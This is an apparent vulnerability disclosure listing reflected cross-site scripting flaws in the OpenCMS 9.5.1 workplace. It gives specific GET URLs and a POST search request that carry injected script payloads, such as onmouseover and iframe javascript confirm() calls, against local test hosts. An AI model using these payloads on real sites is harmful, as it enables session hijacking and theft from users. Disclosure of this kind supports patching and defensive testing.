Description
During some security testing I have identified the following XSS (reflected) vulnerabilities.The OpenCMS 9.5.1 workplace do not properly validate pages and parameters throughout the application.
Request Method: GET
- /opencms/system/modules/org.opencms.workplace.help/jsptemplates/help_head.jsp?__locale=en&homelink="+onmouseover="javascript:confirm(0);">Click HERE<!--
- /opencms/system/workplace/locales/en/help/index.html?buildframe=true&workplaceresource="+onmouseover=confirm(0)//
- /opencms/system/workplace/views/admin/admin-main.jsp?root=explorer&menu=no&path=%2Fpublishqueue';[XSS PAYLOAD]
- /opencms/system/workplace/views/explorer/explorer_files.jsp?mode=explorerview";[XSS PAYLOAD]
Request Method: POST
POST /opencms/system/modules/org.opencms.workplace.help/elements/search.jsp?__locale=en HTTP/1.1
..........................................................................................................................................................
..........................................................................................................................................................
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Content-Length: 104
action=search&query=<iframe src=javascript:confirm(0) &index=German+online+help&searchPage=1&query2=1234